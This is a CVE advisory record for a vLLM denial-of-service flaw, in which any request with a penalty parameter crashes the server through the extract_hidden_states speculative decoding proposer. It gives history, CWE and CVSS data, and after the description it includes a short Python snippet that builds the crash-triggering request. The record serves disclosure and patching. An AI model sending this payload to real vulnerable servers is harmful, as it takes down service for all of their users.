vLLM is an inference and serving engine for large language models (LLMs). In versions prior to 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
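As a minimal sketch of the trigger condition, the payload below builds a completion request carrying one of the penalty parameters named in the advisory. The model name, prompt, and endpoint path are illustrative assumptions, not taken from the advisory; the advisory only states that any single request with a penalty parameter is sufficient.

```python
import json


def build_trigger_payload():
    """Build a minimal completion request that would crash a vulnerable
    (< 0.20.0) server running the extract_hidden_states speculative
    decoding proposer.

    The model name and prompt are placeholders; only the presence of a
    penalty parameter matters per the advisory.
    """
    return {
        "model": "my-model",        # placeholder model name (assumption)
        "prompt": "Hello",
        "max_tokens": 16,
        # Any one of repetition_penalty, frequency_penalty, or
        # presence_penalty triggers the incorrect-shape RuntimeError
        # after the first decode step.
        "repetition_penalty": 1.1,
    }


if __name__ == "__main__":
    # This would be POSTed to the server's OpenAI-compatible endpoint,
    # e.g. http://localhost:8000/v1/completions (address is an assumption).
    print(json.dumps(build_trigger_payload()))
```

Because the crash takes down the EngineCore process rather than a single request, one such payload denies service to all other in-flight requests, which matches the availability-only (A:H) CVSS vector below.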
History

Tue, 12 May 2026 23:30:00 +0000

Type: First Time appeared
Values Added: Vllm-project; Vllm-project vllm

Type: Vendors & Products
Values Added: Vllm-project; Vllm-project vllm

Tue, 12 May 2026 20:15:00 +0000

Type: Description
Values Added: vLLM is an inference and serving engine for large language models (LLMs). In versions prior to 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.

Type: Title
Values Added: vLLM: extract_hidden_states speculative decoding crashes server on any request with penalty parameters

Type: Weaknesses
Values Added: CWE-131, CWE-704

Type: References
Values Added:

Type: Metrics
Values Added: cvssV3_1 {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2026-05-12T19:58:40.862Z

Updated: 2026-05-12T19:58:40.862Z

Reserved: 2026-05-05T15:42:40.518Z

Link: CVE-2026-44223

Vulnrichment

No data.

NVD

Status: Received

Published: 2026-05-12T20:16:43.293

Modified: 2026-05-12T20:16:43.293

Link: CVE-2026-44223

Red Hat

No data.